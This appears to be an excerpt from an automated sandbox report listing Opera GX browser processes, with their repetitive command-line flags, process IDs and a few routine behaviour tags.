C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --field-trial-handle=10344,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7428 /prefetch:12⤵PID:5248
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --field-trial-handle=9696,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:5812
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=9740,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9456 /prefetch:12⤵PID:8108
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=7748,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9324 /prefetch:12⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --field-trial-handle=9380,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9624 /prefetch:12⤵
- Checks computer location settings
PID:7812
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --field-trial-handle=7980,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10284 /prefetch:12⤵PID:7684
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=5296,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9772 /prefetch:12⤵PID:6888
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9420,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9436 /prefetch:82⤵PID:6708
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --field-trial-handle=9860,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=688 /prefetch:12⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10612,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10552 /prefetch:82⤵PID:3452
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=10596,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10108 /prefetch:12⤵
- Checks computer location settings
PID:7680
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6608,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3000 /prefetch:82⤵PID:1596
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=5032,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8320 /prefetch:12⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --field-trial-handle=3064,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10396 /prefetch:22⤵PID:6752
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5620,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:82⤵PID:3744
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=8584,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7308 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5508
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on 